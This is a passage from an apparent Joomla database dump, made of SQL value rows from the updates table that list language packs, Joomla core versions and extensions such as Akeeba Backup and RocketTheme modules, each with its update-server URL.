Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23354,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23355,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23356,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23357,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23358,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23359,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23360,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23361,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23362,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23363,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23364,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23365,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23366,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23367,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23368,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23369,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23370,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23371,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23372,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23374,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23375,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23376,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23377,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23378,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23379,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23380,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23381,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23382,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23383,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23384,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23385,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23386,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23387,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23388,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23389,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23390,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23391,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23392,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23393,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23394,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23395,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23396,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23397,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23398,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23399,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23400,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23401,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23402,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23403,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23404,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23405,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23406,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23407,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23408,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23409,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23410,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23411,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23412,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23413,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23414,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23415,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23416,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23417,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23418,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23419,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23420,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23421,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23422,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23423,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23424,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23425,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23426,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23427,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23428,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23429,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23430,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23431,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23432,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23433,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23434,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23435,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23436,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23437,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23438,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23439,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23440,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23441,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23442,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23443,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23444,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23445,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23446,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23447,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23448,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23449,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23450,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23451,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23452,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23453,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23454,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23455,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23456,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23457,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23458,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23459,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23460,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23461,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23462,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23463,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23464,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23465,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23466,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23467,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23468,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23469,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23470,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23471,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23472,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23473,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23474,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23475,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23476,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23477,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23478,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23479,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23480,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23481,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23482,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23483,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23484,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23485,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23486,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23487,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23488,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23489,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23490,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23491,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23492,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23493,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23494,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23495,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23496,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23497,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23498,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23499,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23500,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23501,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23502,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23503,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23504,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23505,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23506,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23507,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23508,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23509,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23510,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23511,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23512,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23513,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23514,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23515,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23516,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23517,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23518,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23519,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23520,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23521,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23522,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23523,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23524,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23525,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23526,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23527,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23528,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23529,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23530,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23531,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23532,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23533,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23534,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23535,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23536,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23537,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23538,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23539,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23540,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23541,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23542,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23543,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23544,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23545,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23546,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23547,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23548,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23549,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23550,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23551,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23552,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23553,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23554,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23555,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23556,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23557,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23558,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23559,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23560,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23561,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23562,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23563,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23564,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23565,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23566,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23567,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23568,3,0,'German 